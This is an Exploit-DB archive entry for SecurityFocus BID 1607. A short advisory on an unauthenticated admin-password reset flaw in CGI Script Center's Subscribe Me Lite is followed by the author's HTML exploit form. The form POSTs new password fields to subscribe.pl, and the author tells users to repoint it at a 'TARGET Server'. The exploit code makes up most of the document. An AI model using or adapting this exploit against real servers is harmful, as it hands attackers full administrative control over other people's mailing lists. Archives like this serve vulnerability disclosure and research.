exploit-db-mirror/exploits/cgi/remote/20177.html

source: https://www.securityfocus.com/bid/1607/info

Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Subscribe Me Lite. This would grant the user full administrative privileges which includes addition or removal of users from mailing lists.


<html>
<FORM ACTION="http://www.cgiscriptcenter.com/cgi-bin/subprodemo/subscribe.pl" METHOD="POST">
    <CENTER><BR>
    <TABLE BORDER="0" WIDTH="400">
      <TBODY>
      <TR>
        <TD>

        <P><B><FONT FACE="verdana, arial, helvetica"><FONT COLOR="#FF0000">Subscribe
          Me LITE</FONT> Status: Admin Password Set Vulnerability Exploit</FONT></B></P>
        <CENTER><FONT FACE="verdana, arial, helvetica"><FONTCOLOR="#FF0000">n30</FONT></CENTER>
        <P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter the NEW Admin Pass: .</FONT></P>
        <CENTER>
        <TABLE BORDER="0">
          <TBODY>
          <TR>
            <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd"></TD>
            <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD>
          </TR>
          <TR>
            <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD>
            <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD>
          </TR>
          <TR>
            <TD ALIGN="CENTER"><BR>
            <INPUT TYPE="SUBMIT" NAME="setpwd" VALUE="  Set Password  "></TD>
            <TD><BR>
            <INPUT TYPE="RESET" NAME=""></TD>
          </TR></TBODY>
        </TABLE></CENTER></TD>
      </TR></TBODY>
    </TABLE>
<FONTSIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to subscribe.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER></FORM>
</html>